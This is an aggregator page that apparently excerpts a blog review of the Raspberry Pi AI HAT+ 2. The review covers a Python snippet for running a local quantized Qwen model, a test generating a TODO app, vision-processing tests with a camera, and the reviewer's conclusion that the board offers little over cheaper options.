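# Rough sketch of running a local GGUF model through the llama-cpp-python
# bindings (the post itself uses llama.cpp directly; this is an equivalent
# illustration). The model path is a placeholder for the compressed
# Qwen3 30B A3B quantization, and the parameters are illustrative.
from llama_cpp import Llama

llm = Llama(
    model_path="qwen3-30b-a3b-instruct.gguf",  # placeholder filename
    n_ctx=4096,     # context window; more context needs more RAM
    n_threads=4,    # match the Pi 5's four cores
)

response = llm.create_chat_completion(
    messages=[
        {"role": "user", "content": "Generate a single-page TODO list app in HTML/JS."}
    ],
    max_tokens=2048,
)

print(response["choices"][0]["message"]["content"])
```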

I asked it to generate a single-page TODO list app, and it's still not a speed demon (this is a Pi CPU with LPDDR4X RAM we're talking about), but after a little while, it gave me this:

It met all my requirements:

* I can type in as many items as I want

* I can drag them around to rearrange them

* I can check off items and they go to the bottom of the list…

It's honestly crazy how many small tasks you can do even with free local models… even on a Pi. Natural Language Programming was just a dream back when I started my career.

Besides being angry that Google, OpenAI, Anthropic, and all these other companies are consuming all the world's money and resources doing this stuff—not to mention destroying the careers of thousands of junior developers—it is kinda neat to see NLP work for very tightly defined examples.

But I don't think this HAT is the best choice to run local, private LLMs (at least not as a primary goal).

What it is good for is vision processing. But the original AI HAT was good for that too!

In my testing, Hailo's hailo-rpi5-examples were not yet updated for this new HAT, and even if I specified the Hailo 10H manually, model files would not load, or I ran into errors once the board was detected.

But Raspberry Pi's models ran, so I tested them with a Camera Module 3:

I pointed it over at my desk, and it was able to pick out things like my keyboard, my monitor (which it thought was a TV), my phone, and even the mouse tucked away in the back.

It all ran quite fast—and 10x faster than on the Pi's CPU—but the problem is I can do the same thing with the original AI HAT ($110)—or the AI Camera ($70).

If you just need vision processing, I would stick with one of those.

The headline feature of the AI HAT+ 2 is the ability to run in a 'mixed' mode, where it can process machine vision (frames from a camera or video feed) while also running inference (like an LLM or text-to-speech).

Unfortunately, when I tried running two models simultaneously, I ran into segmentation faults or 'device not ready' errors, and lacking any working examples from Hailo, I had to give up on getting that working in time for this post.

Just like the original AI HAT, there are some growing pains.

It seems like with most hardware with AI in the name, it's hardware-first, then software comes later—if it comes at all. At least with Raspberry Pi's track record, the software does come, it's just… often the solutions are only useful in tiny niche use cases.

8 GB of RAM is useful, but it's not quite enough to give this HAT an advantage over just paying for the bigger 16GB Pi with more RAM, which will be more flexible and run models faster.

The main use case for this HAT might be in power-constrained applications where you need both vision processing and inferencing. But even there… it's hard to say "yes, buy this thing", because for just a few more watts, the Pi could achieve better performance for inference in tandem with the $70 AI Camera or the $110 AI HAT+ for the vision processing.

Outside of running tiny LLMs in less than 10 watts, maybe the idea is that you use the AI HAT+ 2 as a development kit for designing devices using the 10H, like self-checkout scanners (which might not even run on a Pi)? I'm not sure.

...

Read the original on www.jeffgeerling.com »

10 221 shares, 8 trendiness

WebTiles


...

Read the original on webtiles.kicya.net »


10HN is also available as an iOS App

If you visit 10HN only rarely, check out the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.